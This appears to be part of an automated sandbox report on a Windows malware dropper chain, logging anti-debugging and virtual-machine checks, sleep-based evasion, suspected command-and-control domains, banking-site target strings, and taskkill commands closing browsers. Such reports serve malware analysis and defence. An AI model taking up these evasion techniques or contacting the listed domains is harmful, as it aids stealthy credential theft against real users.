Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Window / User API: threadDelayed 8445 Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 5144 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe TID: 3252 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5672 Thread sleep count: 71 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5672 Thread sleep time: -142071s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5008 Thread sleep count: 66 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5008 Thread sleep time: -132066s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6844 Thread sleep count: 281 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6844 Thread sleep time: -8430000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5004 Thread sleep count: 64 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5004 Thread sleep time: -128064s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6648 Thread sleep count: 197 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6648 Thread sleep time: -394197s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5832 Thread sleep count: 74 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 5832 Thread sleep time: -148074s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 1816 Thread sleep time: -540000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6648 Thread sleep count: 8445 > 30 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe TID: 6648 Thread sleep time: -16898445s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe TID: 6716 Thread sleep time: -30015s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe TID: 2076 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe TID: 5364 Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe TID: 5784 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe TID: 6036 Thread sleep time: -32016s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe TID: 3892 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe TID: 2684 Thread sleep time: -30015s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe TID: 4336 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe TID: 5940 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe TID: 344 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread delayed: delay time: 180000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Thread delayed: delay time: 922337203685477
Source: skotes.exe, skotes.exe, 00000006.00000002.2398961739.0000000000FC2000.00000040.00000001.01000000.0000000C.sdmp, 7a5878ed96.exe, 0000000A.00000002.2912103066.0000000000A32000.00000040.00000001.01000000.0000000F.sdmp, 7a5878ed96.exe, 0000001F.00000002.3172124663.0000000000A32000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E86000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: - GDCDYNVMware20,11696428655p
Source: num.exe, 0000001D.00000002.3041700292.00000000010EE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMwarey
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: num.exe, 0000001D.00000002.3041700292.000000000114E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWg<
Source: file.exe, 00000000.00000003.2198832216.000000000163E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2198832216.000000000161C000.00000004.00000020.00020000.00000000.sdmp, 7a5878ed96.exe, 0000000A.00000002.2913077883.00000000010C2000.00000004.00000020.00020000.00000000.sdmp, 7a5878ed96.exe, 0000000A.00000002.2913077883.0000000001093000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3158390623.0000021CD967A000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001D.00000002.3041700292.000000000114E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001D.00000002.3041700292.000000000111F000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3158239384.0000023D453CA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3164274908.0000023D45B70000.00000004.00000020.00020000.00000000.sdmp, 7a5878ed96.exe, 0000001F.00000002.3175826524.000000000126A000.00000004.00000020.00020000.00000000.sdmp, 7a5878ed96.exe, 0000001F.00000002.3175826524.0000000001239000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: firefox.exe, 0000001A.00000002.3183561232.000002592F1A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3166441616.0000021CD9B14000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW : 2 : 34 : 1 : 1 : 0x20026 : 0x8 : %SystemRoot%\system32\mswsock.dll : : 1234191b-4bf7-4ca7-86e0-dfd7c32b5445
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: firefox.exe, 0000001C.00000002.3171762525.0000021CD9F40000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyp
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: firefox.exe, 0000001A.00000002.3178430475.0000025925540000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWW%Y
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: firefox.exe, 0000001A.00000002.3178430475.0000025925549000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: firefox.exe, 0000001C.00000002.3171762525.0000021CD9F40000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3158390623.0000021CD967A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001E.00000002.3164274908.0000023D45B70000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
Source: 7a5878ed96.exe, 0000000A.00000002.2913077883.00000000010C2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWHd
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E86000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: YNVMware
Source: 7a5878ed96.exe, 0000001F.00000002.3175826524.00000000011FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: 1664VO856PFRR45SNXLF.exe, 00000003.00000002.2440175857.0000000000E26000.00000040.00000001.01000000.00000006.sdmp, NX5XML9A4AMIPXG5AGRT0AH025A0.exe, 00000004.00000002.2359758169.00000000006C2000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2396780958.0000000000FC2000.00000040.00000001.01000000.0000000C.sdmp, skotes.exe, 00000006.00000002.2398961739.0000000000FC2000.00000040.00000001.01000000.0000000C.sdmp, 7a5878ed96.exe, 0000000A.00000002.2912103066.0000000000A32000.00000040.00000001.01000000.0000000F.sdmp, 7a5878ed96.exe, 0000001F.00000002.3172124663.0000000000A32000.00000040.00000001.01000000.0000000F.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: c1b0009d40.exe, 00000019.00000003.3084594879.0000000005E81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

barindex
Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Code function: 4_2_04EE02BA Start: 04EE03DD End: 04EE031A 4_2_04EE02BA
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\GCVLAW8OP2HD5YHJC3.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\I605ZV9TDN7C3O4NV7U9QCMM6MD004S.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1QL5CL9NMBWTM5JDZ.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Code function: 3_2_00E1C826 rdtsc 3_2_00E1C826
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Code function: 3_2_00C9B7DA LdrInitializeThunk, 3_2_00C9B7DA
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\DKWRY7NZ4BK40ZV6TLNXNQ7QKOI5NI5.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1664VO856PFRR45SNXLF.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: Process Memory Space: 7a5878ed96.exe PID: 2220, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: num.exe PID: 5704, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 7a5878ed96.exe PID: 5144, type: MEMORYSTR
Source: file.exe, 00000000.00000003.2080161295.0000000005460000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.2080161295.0000000005460000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.2080161295.0000000005460000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.2080161295.0000000005460000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.2080161295.0000000005460000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.2080161295.0000000005460000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.2080161295.0000000005460000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.2080161295.0000000005460000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Source: C:\Users\user\AppData\Local\Temp\NX5XML9A4AMIPXG5AGRT0AH025A0.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe "C:\Users\user\AppData\Local\Temp\1002708001\c1b0009d40.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe "C:\Users\user\AppData\Local\Temp\1002709001\7a5878ed96.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe "C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002711001\num.exe "C:\Users\user\AppData\Local\Temp\1002711001\num.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002710001\1dc3787ee3.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
